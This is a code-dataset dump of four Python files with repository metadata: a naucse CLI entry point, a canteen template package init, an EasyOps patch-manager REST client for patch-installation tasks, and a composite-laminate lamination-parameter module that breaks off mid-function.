naucse/cli.py
|
befeleme/naucse.python.cz
|
dee2c8cce8db90108b01b40c0981053943352d11
|
[
"MIT"
] | 71
|
2018-08-26T22:31:39.000Z
|
2022-01-20T10:29:23.000Z
|
naucse/cli.py
|
befeleme/naucse.python.cz
|
dee2c8cce8db90108b01b40c0981053943352d11
|
[
"MIT"
] | 40
|
2018-08-22T14:44:59.000Z
|
2021-09-20T16:11:27.000Z
|
import elsa
from naucse.views import app
def main():
# XXX: Arca stuff
elsa.cli(app, base_url='https://naucse.python.cz')
| 14.777778
| 54
| 0.676692
| 21
| 133
| 4.238095
| 0.809524
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.18797
| 133
| 8
| 55
| 16.625
| 0.824074
| 0.112782
| 0
| 0
| 0
| 0
| 0.206897
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
426ce06f78b6f756ae8c48144ef040f44d71bd60
| 148
|
py
|
Python
|
canteen/templates/compiled/snippets/__init__.py
|
dbl0null/canteen
|
3bef22a2059ef6ac5df178324fbc1dba45316e22
|
[
"MIT"
] | 2
|
2016-08-24T18:42:41.000Z
|
2017-12-08T00:41:02.000Z
|
canteen/templates/compiled/snippets/__init__.py
|
dbl0null/canteen
|
3bef22a2059ef6ac5df178324fbc1dba45316e22
|
[
"MIT"
] | null | null | null |
canteen/templates/compiled/snippets/__init__.py
|
dbl0null/canteen
|
3bef22a2059ef6ac5df178324fbc1dba45316e22
|
[
"MIT"
] | 2
|
2015-09-22T05:36:27.000Z
|
2017-12-08T00:41:21.000Z
|
# -*- coding: utf-8 -*-
"""
compiled templates: compiled.snippets
"""
# subtemplates
from canteen.templates.compiled.snippets.test import *
| 12.333333
| 54
| 0.682432
| 15
| 148
| 6.733333
| 0.733333
| 0.336634
| 0.49505
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008065
| 0.162162
| 148
| 11
| 55
| 13.454545
| 0.806452
| 0.493243
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
42ad346cf207f7113f8aa65651f1c6d4268e84a3
| 7,858
|
py
|
Python
|
patch_manager_sdk/api/patch_task/patch_task_client.py
|
easyopsapis/easyops-api-python
|
adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0
|
[
"Apache-2.0"
] | 5
|
2019-07-31T04:11:05.000Z
|
2021-01-07T03:23:20.000Z
|
patch_manager_sdk/api/patch_task/patch_task_client.py
|
easyopsapis/easyops-api-python
|
adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0
|
[
"Apache-2.0"
] | null | null | null |
patch_manager_sdk/api/patch_task/patch_task_client.py
|
easyopsapis/easyops-api-python
|
adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import sys
import patch_manager_sdk.api.patch_task.create_task_pb2
import patch_manager_sdk.api.patch_task.get_task_detail_pb2
import patch_manager_sdk.api.patch_task.list_task_pb2
import patch_manager_sdk.model.easy_command.task_detail_pb2
import patch_manager_sdk.api.patch_task.update_task_pb2
import patch_manager_sdk.utils.http_util
import google.protobuf.json_format
class PatchTaskClient(object):
def __init__(self, server_ip="", server_port=0, service_name="", host=""):
"""
初始化client
:param server_ip: 指定sdk请求的server_ip,为空时走名字服务路由
:param server_port: 指定sdk请求的server_port,与server_ip一起使用, 为空时走名字服务路由
:param service_name: 指定sdk请求的service_name, 为空时按契约名称路由。如果server_ip和service_name同时设置,server_ip优先级更高
:param host: 指定sdk请求服务的host名称, 如cmdb.easyops-only.com
"""
if server_ip == "" and server_port != 0 or server_ip != "" and server_port == 0:
raise Exception("server_ip和server_port必须同时指定")
self._server_ip = server_ip
self._server_port = server_port
self._service_name = service_name
self._host = host
def create_patch_task(self, request, org, user, timeout=10):
# type: (patch_manager_sdk.api.patch_task.create_task_pb2.CreatePatchTaskRequest, int, str, int) -> patch_manager_sdk.api.patch_task.create_task_pb2.CreatePatchTaskResponse
"""
发起补丁安装任务
:param request: create_patch_task请求
:param org: 客户的org编号,为数字
:param user: 调用api使用的用户名
:param timeout: 调用超时时间,单位秒
:return: patch_manager_sdk.api.patch_task.create_task_pb2.CreatePatchTaskResponse
"""
headers = {"org": org, "user": user}
route_name = ""
server_ip = self._server_ip
if self._service_name != "":
route_name = self._service_name
elif self._server_ip != "":
route_name = "easyops.api.patch_manager.patch_task.CreatePatchTask"
uri = "/api/patch_manager/v1/patch_task"
requestParam = request
rsp_obj = patch_manager_sdk.utils.http_util.do_api_request(
method="POST",
src_name="logic.patch_manager_sdk",
dst_name=route_name,
server_ip=server_ip,
server_port=self._server_port,
host=self._host,
uri=uri,
params=google.protobuf.json_format.MessageToDict(
requestParam, preserving_proto_field_name=True),
headers=headers,
timeout=timeout,
)
rsp = patch_manager_sdk.api.patch_task.create_task_pb2.CreatePatchTaskResponse()
google.protobuf.json_format.ParseDict(rsp_obj["data"], rsp, ignore_unknown_fields=True)
return rsp
def get_patch_task_detail(self, request, org, user, timeout=10):
# type: (patch_manager_sdk.api.patch_task.get_task_detail_pb2.GetPatchTaskDetailRequest, int, str, int) -> patch_manager_sdk.api.patch_task.get_task_detail_pb2.GetPatchTaskDetailResponse
"""
获取补丁安装任务详情
:param request: get_patch_task_detail请求
:param org: 客户的org编号,为数字
:param user: 调用api使用的用户名
:param timeout: 调用超时时间,单位秒
:return: patch_manager_sdk.api.patch_task.get_task_detail_pb2.GetPatchTaskDetailResponse
"""
headers = {"org": org, "user": user}
route_name = ""
server_ip = self._server_ip
if self._service_name != "":
route_name = self._service_name
elif self._server_ip != "":
route_name = "easyops.api.patch_manager.patch_task.GetPatchTaskDetail"
uri = "/api/patch_manager/v1/patch_task/{taskId}".format(
taskId=request.taskId,
)
requestParam = request
rsp_obj = patch_manager_sdk.utils.http_util.do_api_request(
method="GET",
src_name="logic.patch_manager_sdk",
dst_name=route_name,
server_ip=server_ip,
server_port=self._server_port,
host=self._host,
uri=uri,
params=google.protobuf.json_format.MessageToDict(
requestParam, preserving_proto_field_name=True),
headers=headers,
timeout=timeout,
)
rsp = patch_manager_sdk.api.patch_task.get_task_detail_pb2.GetPatchTaskDetailResponse()
google.protobuf.json_format.ParseDict(rsp_obj["data"], rsp, ignore_unknown_fields=True)
return rsp
def list_patch_task(self, request, org, user, timeout=10):
# type: (patch_manager_sdk.api.patch_task.list_task_pb2.ListPatchTaskRequest, int, str, int) -> patch_manager_sdk.api.patch_task.list_task_pb2.ListPatchTaskResponse
"""
获取安装补丁的任务列表
:param request: list_patch_task请求
:param org: 客户的org编号,为数字
:param user: 调用api使用的用户名
:param timeout: 调用超时时间,单位秒
:return: patch_manager_sdk.api.patch_task.list_task_pb2.ListPatchTaskResponse
"""
headers = {"org": org, "user": user}
route_name = ""
server_ip = self._server_ip
if self._service_name != "":
route_name = self._service_name
elif self._server_ip != "":
route_name = "easyops.api.patch_manager.patch_task.ListPatchTask"
uri = "/api/patch_manager/v1/patch_task"
requestParam = request
rsp_obj = patch_manager_sdk.utils.http_util.do_api_request(
method="GET",
src_name="logic.patch_manager_sdk",
dst_name=route_name,
server_ip=server_ip,
server_port=self._server_port,
host=self._host,
uri=uri,
params=google.protobuf.json_format.MessageToDict(
requestParam, preserving_proto_field_name=True),
headers=headers,
timeout=timeout,
)
rsp = patch_manager_sdk.api.patch_task.list_task_pb2.ListPatchTaskResponse()
google.protobuf.json_format.ParseDict(rsp_obj["data"], rsp, ignore_unknown_fields=True)
return rsp
def host_patch_task_callback(self, request, org, user, timeout=10):
# type: (patch_manager_sdk.model.easy_command.task_detail_pb2.TaskDetail, int, str, int) -> patch_manager_sdk.api.patch_task.update_task_pb2.HostPatchTaskCallbackResponse
"""
主机备份任务结果回调
:param request: host_patch_task_callback请求
:param org: 客户的org编号,为数字
:param user: 调用api使用的用户名
:param timeout: 调用超时时间,单位秒
:return: patch_manager_sdk.api.patch_task.update_task_pb2.HostPatchTaskCallbackResponse
"""
headers = {"org": org, "user": user}
route_name = ""
server_ip = self._server_ip
if self._service_name != "":
route_name = self._service_name
elif self._server_ip != "":
route_name = "easyops.api.patch_manager.patch_task.HostPatchTaskCallback"
uri = "/api/patch_manager/v1/host_patch_task"
requestParam = request
rsp_obj = patch_manager_sdk.utils.http_util.do_api_request(
method="POST",
src_name="logic.patch_manager_sdk",
dst_name=route_name,
server_ip=server_ip,
server_port=self._server_port,
host=self._host,
uri=uri,
params=google.protobuf.json_format.MessageToDict(
requestParam, preserving_proto_field_name=True),
headers=headers,
timeout=timeout,
)
rsp = patch_manager_sdk.api.patch_task.update_task_pb2.HostPatchTaskCallbackResponse()
google.protobuf.json_format.ParseDict(rsp_obj["data"], rsp, ignore_unknown_fields=True)
return rsp
| 39.686869
| 194
| 0.648129
| 904
| 7,858
| 5.266593
| 0.137168
| 0.095778
| 0.094518
| 0.071834
| 0.820206
| 0.816005
| 0.798362
| 0.79101
| 0.78975
| 0.751103
| 0
| 0.00638
| 0.262026
| 7,858
| 197
| 195
| 39.888325
| 0.814623
| 0.232502
| 0
| 0.699187
| 0
| 0
| 0.093373
| 0.083231
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04065
| false
| 0
| 0.073171
| 0
| 0.154472
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c4074cd5eb8df55a70f579a712e8c1f26da6518d
| 45,952
|
py
|
Python
|
src/CLA/lampam_functions.py
|
noemiefedon/LAYLA
|
b4aec89131c5bca98d7a0f961090c9152800eccc
|
[
"MIT"
] | null | null | null |
src/CLA/lampam_functions.py
|
noemiefedon/LAYLA
|
b4aec89131c5bca98d7a0f961090c9152800eccc
|
[
"MIT"
] | null | null | null |
src/CLA/lampam_functions.py
|
noemiefedon/LAYLA
|
b4aec89131c5bca98d7a0f961090c9152800eccc
|
[
"MIT"
] | 1
|
2021-12-02T21:10:06.000Z
|
2021-12-02T21:10:06.000Z
|
# -*- coding: utf-8 -*-
"""
Functions to calculate lamination parameters
- filter_lampam
returns lamination parameters where a few numerical approximations have
been filtered regarding the constraints for laminate symmetry and balance,
and the fibre orientations used
- calc_lampam, calc_lampam_2
calculates the lamination parameters of one or more laminates from their
stacking sequence
- calc_lampam_sym
returns the lamination parameters of one or more symmetric laminates
with even ply counts
- calc_lampam_10_sym
returns the 10th lamination parameters of a symmetric laminates
with even ply counts from the half stacking sequences
- calc_lampam_11_sym
returns the 11th lamination parameters of a symmetric laminates
with even ply counts from the half stacking sequences
- test_lampam
returns the lamination parameter components associated to a symmetric
multi-panel structure with the orientations of its outer plies known, the
rest of the plies assumed as quasi-isotopic
- calc_lampam_mp
returns the lamination parameters of a multipanel structure
- calc_delta_lampam_1
returns ply partial lamination parameters
(considers the two symmetric parts for a symmetric laminate)
- calc_delta_lampam
returns the lamination parameters of ply groups plies
(considers the two symmetric parts for a symmetric laminate)
- calc_delta_lampamA
returns the in-plane lamination parameters of ply groups plies
(considers the two symmetric parts for a symmetric laminate)
- calc_delta_lampamD
returns the out-of-plane lamination parameters of ply groups plies
(considers the two symmetric parts for a symmetric laminate)
- calc_delta_lampam_mp
returns lamination parameters associated with the sublaminate
corresponding to a group of plies in a multi-panel structure
- calc_delta_lampam_mp_2
returns the partial lamination parameters associated to the outer plies
used to improve the damage tolerance of a multi-panel structure
- calc_delta_lampam_mp_3
returns the lamination parameters associated to a single ply in a
multi-panel structure
(when the ply does not cover a panel, the lamination parameter are zeros)
- calc_delta_lampam_mp_3A
returns the in-plane lamination parameters associated to a single ply in a
multi-panel structure
(when the ply does not cover a panel, the lamination parameter are zeros)
- calc_delta_lampam_mp_3D
returns the out-of-plane lamination parameters associated to a single ply
in a multi-panel structure
(when the ply does not cover a panel, the lamination parameter are zeros)
- calc_delta_lampam_tab
returns lamination parameter components associated with one group of plies
with uniform thickness
(considers the two symmetric parts for a symmetric laminate)
- calc_delta_lampam_tab_t
returns lamination parameter components associated with groups of plies
with varying thickness
(considers the two symmetric parts for a symmetric laminate)
- calc_delta_lampam_tab_t_1
returns lamination parameter components associated with one group of plies
with varying thickness
(considers the two symmetric parts for a symmetric laminate)
"""
__version__ = '1.0'
__author__ = 'Noemie Fedon'
import sys
import numpy as np
sys.path.append(r'C:\LAYLA')
from src.divers.pretty_print import print_lampam, print_ss
from src.LAYLA_V02.parameters import Parameters
from src.LAYLA_V02.constraints import Constraints
def filter_lampam(lampam, constraints):
"""
returns lamination parameters where a few numerical approximations have
been filtered regarding the constraints for laminate symmetry and balance,
and the fibre orientations used
OUTPUTS
- lampam: array storing the filtered lamination parameters
INPUTS
- lampam: array storing the laminate lamination parameters
- constraints: design and manufacturing guidelines
"""
if lampam.ndim == 1:
if constraints.sym:
lampam[4:8] = 0
# if constraints.bal:
# lampam[2:4] = 0
if constraints.n_set_of_angles:
sett = set([0, 45, -45, 90, -90, 135, -135])
if np.all([el in sett for el in constraints.set_of_angles]):
lampam[3] = 0
lampam[7] = 0
lampam[11] = 0
elif lampam.ndim == 2:
if constraints.sym:
lampam[:, 4:8] = 0
# if constraints.bal:
# lampam[:, 2:4] = 0
if constraints.n_set_of_angles:
sett = set([0, 45, -45, 90, -90, 135, -135])
if np.all([el in sett for el in constraints.set_of_angles]):
lampam[:, 3] = 0
lampam[:, 7] = 0
lampam[:, 11] = 0
else:
raise Exception('This should not happen.')
return lampam
def calc_lampam_from_delta_lp_matrix(stack, constraints, delta_lampams):
"""
returns the lamination parameters of a laminate
INPUTS
- ss: laminate stacking sequences
- constraints: design and manufacturing guidelines
- delta_lampams: ply partial lamination parameters
"""
lampam = np.zeros((12,), float)
for ind_ply in range(delta_lampams.shape[0]):
lampam += delta_lampams[
ind_ply, constraints.ind_angles_dict[stack[ind_ply]]]
return lampam
def calc_lampam_2(ss):
"""
returns the lamination parameters of one or more laminates
OUTPUTS
- lampam: laminate lamination parameters
INPUTS
- ss: laminate stacking sequences
- constraints: design and manufacturing guidelines
"""
if isinstance(ss, list):
lampam = np.zeros((len(ss), 12), float)
for index in range(len(ss)):
lampam[index] = calc_lampam_2(ss[index])
return lampam
if ss.ndim == 2 and ss.shape[0] > 1:
lampam = np.zeros((ss.shape[0], 12), float)
for index in range(ss.shape[0]):
lampam[index] = calc_lampam_2(ss[index])
return lampam
n_plies_in_panels = np.size(ss) # laminate ply count
theta2 = np.deg2rad(2*ss.astype(float))
theta4 = 2*theta2
cos_sin = np.concatenate((
np.cos(theta2),
np.cos(theta4),
np.sin(theta2),
np.sin(theta4))).reshape((4, n_plies_in_panels))
for_the_top = np.arange(n_plies_in_panels)
z_0 = np.ones(n_plies_in_panels)
z_2 = ((1-n_plies_in_panels/2)*z_0+for_the_top)**3 \
- ((1-n_plies_in_panels/2)*z_0+for_the_top - 1)**3
z_1 = ((1-n_plies_in_panels/2)*z_0+for_the_top)**2 \
- ((1-n_plies_in_panels/2)*z_0+for_the_top - 1)**2
return np.array([
(1/n_plies_in_panels)*np.matmul(cos_sin, z_0),
(2/n_plies_in_panels**2)*np.matmul(cos_sin, z_1),
(4/n_plies_in_panels**3)*np.matmul(cos_sin, z_2)]).reshape(12)
def calc_lampam(ss, constraints=None):
"""
returns the lamination parameters of one or more laminates
OUTPUTS
- lampam: laminate lamination parameters
INPUTS
- ss: laminate stacking sequences
- constraints: design and manufacturing guidelines
"""
if constraints is None:
return calc_lampam_2(ss)
if isinstance(ss, list):
lampam = np.zeros((len(ss), 12), float)
for index in range(len(ss)):
lampam[index] = calc_lampam(ss[index], constraints)
return lampam
if ss.ndim == 2 and ss.shape[0] > 1:
lampam = np.zeros((ss.shape[0], 12), float)
for index in range(ss.shape[0]):
lampam[index] = calc_lampam(ss[index], constraints)
return lampam
n_plies_in_panels = np.size(ss) # laminate ply count
if not constraints.sym:
cos_sin = np.empty((4, n_plies_in_panels), float)
for ind in range(n_plies_in_panels):
cos_sin[:, ind] = np.copy(constraints.cos_sin[
constraints.ind_angles_dict[ss[ind]]].reshape((4, )))
for_the_top = np.arange(n_plies_in_panels)
z_0 = np.ones(n_plies_in_panels)
z_2 = ((1-n_plies_in_panels/2)*z_0+for_the_top)**3 \
- ((1-n_plies_in_panels/2)*z_0+for_the_top - 1)**3
z_1 = ((1-n_plies_in_panels/2)*z_0+for_the_top)**2 \
- ((1-n_plies_in_panels/2)*z_0+for_the_top - 1)**2
return np.array([
(1/n_plies_in_panels)*np.matmul(cos_sin, z_0),
(2/n_plies_in_panels**2)*np.matmul(cos_sin, z_1),
(4/n_plies_in_panels**3)*np.matmul(cos_sin, z_2)]).reshape(12)
cos_sin = np.empty((4, np.size(ss) // 2), float)
for ind in range(np.size(ss) // 2):
cos_sin[:, ind] = constraints.cos_sin[
constraints.ind_angles_dict[ss[ind]]].reshape((4,))
for_the_top = np.arange(np.size(ss) // 2)
z_0 = np.ones(np.size(ss) // 2)
z_2 = ((1 - n_plies_in_panels / 2) * z_0 + for_the_top) ** 3 \
- ((1 - n_plies_in_panels / 2) * z_0 + for_the_top - 1) ** 3
lampam = np.array([
(2/n_plies_in_panels)*np.matmul(cos_sin, z_0),
np.array([0, 0, 0, 0]),
(8/n_plies_in_panels**3)*np.matmul(cos_sin, z_2)]).reshape(12)
if np.size(ss) % 2:
cos_sin_mid = constraints.cos_sin[
constraints.ind_angles_dict[ss[n_plies_in_panels // 2]]]
lampam += np.array([
(1/n_plies_in_panels)*cos_sin_mid,
np.zeros((4,), dtype=float),
(1/n_plies_in_panels**3)*cos_sin_mid]).reshape(12)
return lampam
def calc_lampam_sym(ss, constraints):
"""
returns the lamination parameters of one or more symmetric laminates
with even ply counts from the half stacking sequences
OUTPUTS
- lampam: laminate lamination parameters
INPUTS
- ss: half laminate stacking sequences
- constraints: design and manufacturing guidelines
"""
if isinstance(ss, list):
lampam = np.zeros((len(ss), 12), float)
for index in range(len(ss)):
lampam[index] = calc_lampam_sym(ss[index], constraints)
return lampam
if ss.ndim == 2 and ss.shape[0] > 1:
lampam = np.zeros((ss.shape[0], 12), float)
for index in range(ss.shape[0]):
lampam[index] = calc_lampam_sym(ss[index], constraints)
return lampam
n_plies_in_panels = 2 * np.size(ss) # laminate ply count
cos_sin = np.empty((4, n_plies_in_panels // 2), float)
for ind in range(n_plies_in_panels // 2):
cos_sin[:, ind] = constraints.cos_sin[
constraints.ind_angles_dict[ss[ind]]].reshape((4, ))
for_the_top = np.arange(n_plies_in_panels // 2)
z_0 = np.ones(n_plies_in_panels // 2)
z_2 = ((1 - n_plies_in_panels / 2) * z_0 + for_the_top) ** 3 \
- ((1 - n_plies_in_panels / 2) * z_0 + for_the_top - 1) ** 3
lampam = np.array([
(2 / n_plies_in_panels)*np.matmul(cos_sin, z_0),
np.array([0, 0, 0, 0]),
(8 / n_plies_in_panels**3)*np.matmul(cos_sin, z_2)]).reshape(12)
return lampam
def calc_lampam_10_sym(ss, constraints):
"""
returns the 10th lamination parameters of a symmetric laminates
with even ply counts from the half stacking sequences
INPUTS
- ss: half laminate stacking sequences
- constraints: design and manufacturing guidelines
"""
n_plies_in_panels = 2 * np.size(ss) # laminate ply count
cos_sin = np.empty((n_plies_in_panels // 2), float)
for ind in range(n_plies_in_panels // 2):
cos_sin[ind] = constraints.cos_sin[
constraints.ind_angles_dict[ss[ind]]][1]
for_the_top = np.arange(n_plies_in_panels // 2)
z_0 = np.ones(n_plies_in_panels // 2)
z_2 = ((1 - n_plies_in_panels / 2) * z_0 + for_the_top) ** 3 \
- ((1 - n_plies_in_panels / 2) * z_0 + for_the_top - 1) ** 3
return (8 / n_plies_in_panels**3)*np.matmul(cos_sin, z_2)
def calc_lampam_11_sym(ss, constraints):
"""
returns the 11th lamination parameters of a symmetric laminates
with even ply counts from the half stacking sequences
INPUTS
- ss: half laminate stacking sequences
- constraints: design and manufacturing guidelines
"""
n_plies_in_panels = 2 * np.size(ss) # laminate ply count
cos_sin = np.empty((n_plies_in_panels // 2), float)
for ind in range(n_plies_in_panels // 2):
cos_sin[ind] = constraints.cos_sin[
constraints.ind_angles_dict[ss[ind]]][2]
for_the_top = np.arange(n_plies_in_panels // 2)
z_0 = np.ones(n_plies_in_panels // 2)
z_2 = ((1 - n_plies_in_panels / 2) * z_0 + for_the_top) ** 3 \
- ((1 - n_plies_in_panels / 2) * z_0 + for_the_top - 1) ** 3
return (8 / n_plies_in_panels**3)*np.matmul(cos_sin, z_2)
def calc_lampam_mp(sslist, constraints):
"""
returns lamination parameter components associated to an entire
multipanel structure
OUTPUTS
- lampam: array storing the lamination parameters of the laminates (array)
INPUTS
- sslist: list of the stacking sequences for each panel
- constraints: design and manufacturing guidelines
"""
n_panels = len(sslist)
lampam = np.zeros((n_panels, 12), dtype=float)
for ind_panel in range(n_panels):
lampam[ind_panel] = calc_lampam(sslist[ind_panel], constraints)
return lampam
def test_lampam(ss_top, n_plies_per_panel):
"""
returns the lamination parameter components associated to a symmetric
multi-panel structure with the orientations of its outer plies known
(in ss_top), the rest of the plies assumed as quasi-isotopic (lampam = 0)
INPUTS
- n_plies_per_panel: list of the number of plies per panels
- ss_top: list of the panel partial half stacking sequences
"""
n_panels = len(ss_top)
if n_panels != len(n_plies_per_panel):
raise Exception('This should not happen!')
lampam = np.zeros((n_panels, 12), dtype=float)
for ind_panel in range(n_panels):
if n_plies_per_panel[ind_panel] // 2 + 1 == len(ss_top[ind_panel]):
middle_ply = len(ss_top[ind_panel])
n_plies_group = len(ss_top[ind_panel]) - 1
else:
middle_ply = 0
n_plies_group = len(ss_top[ind_panel])
lampam[ind_panel] = calc_delta_lampam(
ss_top[ind_panel],
n_first_ply=1,
n_plies_group=n_plies_group,
n_plies_in_panels=n_plies_per_panel[ind_panel],
constraints=constraints,
middle_ply=middle_ply)
return lampam
def calc_delta_lampam(ss, n_first_ply, n_plies_group, n_plies_in_panels,
constraints, middle_ply=0):
"""
returns the lamination parameters of ply groups plies taking into account
the two symmetric part for a symmetric sublaminate.
Attention: if a middle ply + X plies are accounted for, enter X for the
number of plies to consider and not X + 1/2
OUTPUTS
- delta_lampam: array storing the sublaminate partial lamination parameters
INPUTS
- ss: array storing the sublaminate stacking sequence
- n_first_ply is the number of the top ply in the sublaminate with a
numbering starting from the bottom to the top of the laminate (int)
- n_plies_group: ply count of the sublaminate (int),
BEWARE: n_plies_group does not account for any middle ply!!!
- n_plies_in_panels: ply count of the laminate (int)
- constraints: design and manufacturing guidelines
- middle_ply = 0 if there is no ply overlapping the mid-surface,
otherwise middle_ply is equal to the number of this ply
"""
# print('n_first_ply', n_first_ply)
# print('n_plies_group', n_plies_group)
# print('n_plies_in_panels', n_plies_in_panels)
# print('ss', ss)
if n_plies_group > ss.size:
raise Exception("""
The stacking sequence of the sublaminate does not have enough plies.""")
if n_plies_group + n_first_ply - 1 > n_plies_in_panels:
raise Exception("""
The sublaminate is not defined as to be within the laminate.""")
cos_sin = np.empty((4, n_plies_group), float)
for ind in range(n_plies_group):
cos_sin[:, ind] = constraints.cos_sin[
constraints.ind_angles_dict[ss[ind]]].reshape((4, ))
for_the_top = np.arange(n_plies_group)
z_0 = np.ones(n_plies_group)
z_2 = ((n_first_ply-n_plies_in_panels/2)*z_0+for_the_top)**3 \
- ((n_first_ply-n_plies_in_panels/2)*z_0+for_the_top - 1)**3
if not constraints.sym:
z_1 = ((n_first_ply - n_plies_in_panels/2)*z_0+for_the_top)**2 \
- ((n_first_ply - n_plies_in_panels/2)*z_0+for_the_top - 1)**2
delta_lampam = np.array([
(1/n_plies_in_panels)*np.matmul(cos_sin, z_0),
(2/n_plies_in_panels**2)*np.matmul(cos_sin, z_1),
(4/n_plies_in_panels**3)*np.matmul(cos_sin, z_2)]).reshape(12)
else:
delta_lampam = np.array([
(2/n_plies_in_panels)*np.matmul(cos_sin, z_0),
np.zeros((4,), dtype=float),
(8/n_plies_in_panels**3)*np.matmul(cos_sin, z_2)]).reshape(12)
# Add the contribution of a ply overlapping the middle surface
if n_first_ply + n_plies_group == middle_ply:
cos_sin_mid = constraints.cos_sin[
constraints.ind_angles_dict[ss[n_plies_group]]].reshape(4)
delta_lampam += np.array([
(1/n_plies_in_panels)*cos_sin_mid,
np.zeros((4,), dtype=float),
(1/n_plies_in_panels**3)*cos_sin_mid]).reshape(12)
return delta_lampam
def calc_delta_lampamA(ss, n_first_ply, n_plies_group, n_plies_in_panels,
constraints, middle_ply=0):
"""
returns the in-pnae lamination parameters of ply groups plies taking into
account the two symmetric part for a symmetric sublaminate.
Attention: if a middle ply + X plies are accounted for, enter X for the
number of plies to consider and not X + 1/2
OUTPUTS
- delta_lampam: array storing the sublaminate partial lamination parameters
INPUTS
- ss: array storing the sublaminate stacking sequence
- n_first_ply is the number of the top ply in the sublaminate with a
numbering starting from the bottom to the top of the laminate (int)
- n_plies_group: ply count of the sublaminate (int),
BEWARE: n_plies_group does not account for any middle ply!!!
- n_plies_in_panels: ply count of the laminate (int)
- constraints: design and manufacturing guidelines
- middle_ply = 0 if there is no ply overlapping the mid-surface,
otherwise middle_ply is equal to the number of this ply
"""
if n_plies_group > ss.size:
raise Exception("""
The stacking sequence of the sublaminate does not have enough plies.""")
if n_plies_group + n_first_ply - 1 > n_plies_in_panels:
raise Exception("""
The sublaminate is not defined as to be within the laminate.""")
cos_sin = np.zeros((4,), float)
for ind in range(n_plies_group):
cos_sin += constraints.cos_sin[
constraints.ind_angles_dict[ss[ind]]].reshape(4)
if not constraints.sym:
return (1 / n_plies_in_panels) * cos_sin
# Add the contribution of a ply overlapping the middle surface
if n_first_ply + n_plies_group == middle_ply:
cos_sin += 0.5 * constraints.cos_sin[
constraints.ind_angles_dict[ss[n_plies_group]]].reshape(4)
return (2/n_plies_in_panels) * cos_sin
def calc_delta_lampamD(ss, n_first_ply, n_plies_group, n_plies_in_panels,
constraints, middle_ply=0):
"""
returns the out-of-plane lamination parameters of ply groups plies taking
into account the two symmetric part for a symmetric sublaminate.
Attention: if a middle ply + X plies are accounted for, enter X for the
number of plies to consider and not X + 1/2
OUTPUTS
- delta_lampam: array storing the sublaminate partial lamination parameters
INPUTS
- ss: array storing the sublaminate stacking sequence
- n_first_ply is the number of the top ply in the sublaminate with a
numbering starting from the bottom to the top of the laminate (int)
- n_plies_group: ply count of the sublaminate (int),
BEWARE: n_plies does not account for any middle ply!!!
- n_plies_in_panels: ply count of the laminate (int)
- constraints: design and manufacturing guidelines
- middle_ply = 0 if there is no ply overlapping the mid-surface,
otherwise middle_ply is equal to the number of this ply
"""
if n_plies_group > ss.size:
raise Exception("""
The stacking sequence of the sublaminate does not have enough plies.""")
if n_plies_group + n_first_ply - 1 > n_plies_in_panels:
raise Exception("""
The sublaminate is not defined as to be within the laminate.""")
cos_sin = np.empty((4, n_plies_group), float)
for ind in range(n_plies_group):
cos_sin[:, ind] = constraints.cos_sin[
constraints.ind_angles_dict[ss[ind]]].reshape((4, ))
for_the_top = np.arange(n_plies_group)
z_0 = np.ones(n_plies_group)
z_2 = ((n_first_ply-n_plies_in_panels/2)*z_0+for_the_top)**3 \
- ((n_first_ply-n_plies_in_panels/2)*z_0+for_the_top - 1)**3
if not constraints.sym:
delta_lampam = np.array([
(4/n_plies_in_panels**3)*np.matmul(cos_sin, z_2)]).reshape(4)
else:
delta_lampam = np.array([
(8/n_plies_in_panels**3)*np.matmul(cos_sin, z_2)]).reshape(4)
# Add the contribution of a ply overlapping the middle surface
if n_first_ply + n_plies_group == middle_ply:
cos_sin_mid = constraints.cos_sin[
constraints.ind_angles_dict[ss[n_plies_group]]]
delta_lampam += (1/n_plies_in_panels**3) * cos_sin_mid.reshape((4))
return delta_lampam
def calc_delta_lampam_mp(ss, multipanel, constraints, inner_step=-1):
"""
returns the lamination parameters associated with a group of plies of a
multi-panel structure
OUTPUTS
- delta_lampam: array storing the sublaminate partial lamination parameters
INPUTS
- ss: array storing the sublaminate stacking sequence
- multipanel: multi-panel structure
- constraints: design and manufacturing guidelines
- inner_step: index of the step for the inner loop
"""
# incorrect number of panels ?
if len(ss) != multipanel.n_panels:
raise Exception("""
Incorrect number of input stacking sequences for the multipanel structure.""")
# incorrect ply counts for the partial stacking sequences ?
for ind_panel, panel in enumerate(multipanel.panels):
if not constraints.sym:
pass
elif (ss[ind_panel].size == panel.n_plies_per_group[inner_step] \
and (panel.middle_ply == 0 \
or inner_step != multipanel.reduced.n_groups - 1)):
pass
elif (ss[ind_panel].size == panel.n_plies_per_group[inner_step] + 1\
and (panel.middle_ply != 0 \
and inner_step == multipanel.reduced.n_groups - 1)):
pass
elif ss[ind_panel].size == panel.n_plies \
and inner_step == multipanel.reduced.n_groups - 1:
pass
else:
# print('ind_panel', ind_panel)
# print('ss[ind_panel].size, panel.n_plies',
# ss[ind_panel].size, panel.n_plies)
